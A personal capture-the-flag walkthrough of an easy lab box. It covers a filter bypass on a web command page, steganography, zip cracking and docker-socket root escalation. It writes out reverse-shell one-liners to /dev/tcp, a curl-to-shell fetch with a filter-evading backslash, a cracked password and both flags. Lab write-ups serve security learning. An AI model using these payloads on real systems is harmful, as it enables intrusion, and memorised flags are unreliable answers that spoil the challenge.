Easy level CTF. Capture the flags and have fun!
Enumeration shows an open FTP, SSH and Apache - pretty standard stuff.
Looks like we have anonymous FTP access, with a note in the root.
Anurodh told me that there is some filtering on strings being put in the command -- Apaar
Let's peek at the website. Looks pretty nice.
The only thing of note in the source code is
<!--made by vipul mirajkar thevipulm.appspot.com-->
That takes us to his site, which shows us he likes Java, Spring in particular... do I smell a Spring4Shell? While I was poking around I ran a gobuster, who found this (is it weird I define my tools as entities?)
Nothing super obvious in the images folder, but the secret folder gives us some command tools.
If we try some easy commands like ls ../../../ it catches us doing something naughty.
BUT if we do a simple command like pwd it's fine
It's also fine if we do a ping command. So, playing around, I see we can use the dir command and traverse some directories. With a little research we can write out the files with od... well, sorta.
Doing a quick peek at the writeup, I see we can escape with backslashes, so let's play with that a bit. I know that "dir ../../../../" will get me to the root and, after playing, I see I have access to Apaar's user account, which has a local.txt file in it.
Weirdly, the escape characters don't show the contents of the file... okay, so peeking at the writeup again, it looks like when we \cat out the index.php file we can see the filters... dang. Missed that.
Well, I see nc is filtered but not the elongated netcat. When I played with that, I got a "shell" but it sucked - no echo out.
BUT when I killed the session... all the text I typed showed up... so let's try something. I tried to just use 'cat ../../../../apaar/local.txt' but that didn't work - looks like it's only echoing my commands, not the return from those commands.
Well, I hate to do this but I think I'm going to have to follow the writeup a bit, 'cause I don't know what's going on. I've created a shell script with this in it (on my local box):
bash -c "bash -i >& /dev/tcp/10.10.237.144/1234 0>&1"
Then I hosted it on a python web server. I created an nc listener on my local box and then ran this on the website:
curl 10.8.2.58:8000/shell.sh | ba\sh
That gave me a shell, but again without any echo. Doing a ctrl-Z and running stty raw -echo; fg doesn't seem to fix the issue either.
Okay so annoying but reading through some of the other writeups, it looks like you can just use the full path... and this command got me a stable shell:
/bin/bash -c '/bin/bash >& /dev/tcp/10.6.101.7/4444 0>&1'
Once we get a shell we realize we STILL don't have access to the user file we need so let's see what we can do. sudo -l tells us we can run this script.
In order to run this app it says we need a tty present and to specify an askpass. It looks like tty identifies the terminal attached to the process's standard input (e.g. /dev/ttys001), and askpass refers to a helper program used to prompt a user for credentials (ssh-askpass). We get this error because sudo needs to prompt for a password but has no tty to prompt on.
We don't HAVE a password, so running that isn't going to be helpful anyway; let's move on. Let's upgrade our shell:
Give us a better featured bash shell:
python -c 'import pty;pty.spawn("/bin/bash")'
Give us term commands like clear:
export TERM=xterm
Give us auto-complete and Ctrl+C: press Ctrl+Z, then back in our own terminal type
stty raw -echo; fg
I was going to get linpeas on this but I can't find anywhere where I have write permission... poking around the file system a bit, there's a folder called files and the file index.php has a database password
The file hacker.php gives us this clue
We set up a python web server on this shell and use it to host the pictures in the images directory. We download those images and, even though binwalk doesn't say there's anything in 'em, I learned a valuable lesson: just give steghide a try!
steghide extract -sf hacker-with-laptop_23-2147985341.jpg
This gives us a zip file that's been password protected. We have to use zip2john to get the hash and crack it. What we get is some source code; inside it we see an encrypted password that's listed as base64.
We decode this with a free base64 decoder we found online. We get this:
!d0ntKn0wmYp@ssw0rd
Interesting. Further on down that same file, we see a welcome text for Anurodh, so we know who this is for. Looks like this is the ssh login information!
Okay so this next part is a bit messed up. I started out with linpeas to show me what was available. There was a docker socket that had a known CVE and I was able to find instructions here: https://book.hacktricks.xyz/linux-hardening/privilege-escalation#writable-docker-socket
Where it gets messy is that I wasn't able to get it to run - but then, getting some hints from one of the writeups, I changed the docker image to one that was local and it magically dropped me into root!
From what I can gather, docker is OS-level virtualization software that lets you run stuff in "containers". The command below breaks down like this:
-H - the local docker socket (that we have write access to)
run - runs a command in a new container
-v - bind mounts a volume, here the host's / at /host inside the container
-it - keeps STDIN open even if not attached and allocates a pseudo-tty
ubuntu - assuming this is the docker image we want to use (which fails, so we change to alpine)
chroot - changes the root directory to /host
/bin/bash - the main process we want to run
{USER-FLAG: e8vpd3323cfvlp0qpxxx9qtr5iq37oww}
{ROOT-FLAG: w18gfpn9xehsgd3tovhk0hby4gdp89bg}